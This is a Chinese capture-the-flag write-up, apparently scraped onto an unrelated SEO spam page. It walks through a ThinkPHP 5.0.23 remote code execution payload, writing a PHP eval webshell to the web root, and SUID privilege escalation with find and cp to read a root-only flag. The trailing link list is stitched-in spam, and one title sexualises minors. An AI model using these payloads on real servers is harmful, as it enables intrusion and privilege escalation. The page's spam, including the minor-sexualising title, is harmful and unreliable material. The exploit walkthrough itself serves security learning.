当前位置: 首页 > news >正文

新泰网站建设2022年搜索引擎优化指南

新泰网站建设,2022年搜索引擎优化指南,只做黑白摄影的网站,安徽淮北发现一例前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难 Final 考点: ThinkPHP 5.0.23 RCE一句话木马上传SUID提权(find) 解题: 首先页面就给了ThinkPHP V5, 那无非考…

 前言:比赛是结束了,但我的学习还未结束,看看自己能复习几道题吧,第四周实在太难

Final

考点:

ThinkPHP 5.0.23 RCE+一句话木马上传+SUID提权(find)

 解题:

首先页面就给了ThinkPHP V5, 那无非考的就是ThinkPHP版本的漏洞 ,经过信息收集发现确实是ThinkPHP 5.0.23漏洞 下篇文章即有现成的讲解:

https://blog.csdn.net/Lucky1youzi/article/details/128740552

我们按照他说的做,首先抓包进行传参

GET:index.php?s=captcha
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 这个参数1 是可以进行修改的,竟然能出现phpinfo页面 ,那我们就可以进行RCE,但是我们发现命令执行参数全被ban了,可能是权限的问题 ,我们上传一句话木马

_method=__construct&filter[]=exec&method=get&server[REQUEST_METHOD]=echo%20'<?php%20eval($_POST['cmd']);?>'%20>%20/var/www/public/1.php

然后蚁剑连接后发现根目录下存在flag文件

但是里面内容没有 ,一眼没权限,我们去终端看看

我们发现 -rwx-----意思就是只能文件主的权限使用 意思就是最高权限才能读

尝试chmod无果

然后我们这里就查看具有SUID权限的命令:

find / -user root -perm -4000 -print 2>/dev/null

这个利用find进行提权可以访问

https://blog.csdn.net/rlenew/article/details/111873682

 

我们使用cp命令SUID提权读取Flag:

cp /flag_dd3f6380aa0d /dev/stdout

 / dev / stdout是—个特殊的文件,代表标准输出。

http://www.zhongyajixie.com/news/42599.html

相关文章:

  • 新郑整站优化百度联系方式
  • 做游戏网站有钱赚吗微信营销推广公司
  • 和幼女做视频网站百度seo公司电话
  • safari网站入口营销推广费用预算表
  • 做网站属软件什么专业seo技术顾问
  • 大学做兼职英语作文网站湖南网站建设营销推广
  • 合肥网页制作培训上海关键词排名优化公司
  • 网站建设作业过程公司怎么建立自己的网站
  • 做网站常用代码向右浮动怎么写设计培训学院
  • 学勇建站汕头seo排名公司
  • 网站做裂变引流网络营销未来有哪些发展趋势
  • 做视频网站要多大的服务器百度注册
  • 做市场调查分析的网站seo和sem是什么意思
  • 那些企业网站做的较好苏州整站优化
  • 个人做网站的时代已经过去个人介绍网页制作
  • 西安网站设计 牛人网络国内高清视频素材网站推荐
  • 微网站自己可以做么软文大全500篇
  • 什么网站允许搭建下载班级优化大师
  • 响应式网站展示型seo推广培训
  • 如何登录网站空间网推怎么推广
  • 加盟类网站建设武汉网站设计十年乐云seo
  • 如何设计网站首页网络营销ppt讲解
  • 做网站销售提成怎么算网站优化推广平台
  • 北京网站制作公司都在哪里在线刷关键词网站排名
  • 北京建设和住房委员会网站做网站的公司有哪些
  • 国外主流媒体网站宣传渠道有哪些
  • 广州做动态网站的公司独立站seo实操
  • java做视频网站的需求济南新闻头条最新事件
  • 横向网站源码恶意点击竞价时用的什么软件
  • 网站窗口建设互动营销案例